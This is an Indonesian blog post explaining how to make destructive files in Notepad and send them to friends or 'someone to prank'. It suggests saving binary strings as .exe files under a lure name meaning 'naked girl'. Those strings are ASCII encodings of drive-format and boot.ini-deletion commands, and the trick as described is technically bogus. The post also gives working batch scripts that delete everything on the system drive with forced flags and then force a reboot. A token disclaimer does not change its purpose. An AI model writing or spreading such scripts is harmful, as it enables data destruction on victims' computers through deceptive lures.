Cara Memformat Hard disk Menggunakan Notepad

Mau tau cara memformat harddisk menggunakan notepad? yang penting Jangan dicoba di PC Anda, hanya untuk pengetahuan saja yah, sekalian nambah ilmu. , yuk mulai:


Langkah Pertama:

Copy kode binary berikut ke notepad, sebelumnya buka dulu program notepad yah, kl ga tau cara buka notepad klik Start–>All Programs–>accessories klik Notepad.

01001011000111110010010101010101010000011111100000

Langkah Kedua:

Simpanlah dengan ekstensi file .EXE mau nama apa terserah anda. atau coba simpan dengan nama cewe_bugil.exe :p

Langkah Ketiga: kirim buat teman atau orang yg mau dikerjain .

Jika anda fikir kita tidak dapat memformat harddisk dalam kondisi windows sedang aktiv? coba terka…, kalo ngga coba test dengan harddisk yang lain, coba kode simpel binary berikut:

format c:\ /Q/X — ini akan memformat drive c:\

Kode:



01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000

format d:\ /Q/X — ini akan memformat drive d:\

Kode:



01100110011011110111001001101101011000010111010000 100000011001000011101001011100

0010000000101111010100010010111101011000

format a:\ /Q/X — ini akan memformat drive a:\

Kode:



01100110011011110111001001101101011000010111010000 100000011000010011101001011100

0010000000101111010100010010111101011000

del /F/S/Q c:\boot.ini — ini akan menyebabkan komputer tidak akan booting. 

Kode:



01100100011001010110110000100000001011110100011000 101111010100110010111101010001

00100000011000110011101001011100011000100110111101 101111011101000010111001101001

0110111001101001

Coba fikir lebih kreatif? atau mau yang lebih keren lagi coba ini:

Buka notepad dan masukin:



@Echo off

Del C:\ *.*|y

Simpan dengan nama Gue.bat 

atau mau yang lebih menyeramkan?



@echo off

del %systemdrive%\*.*/f/s/q

shutdown -r -f -t 00

Simpan dengan nama apa.bat atau apa saja sesuai dengan kesukaan. , kirim buat teman yah

http://tulisan-menarik.blogspot.com/

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

Daftar Isi

%d blogger menyukai ini: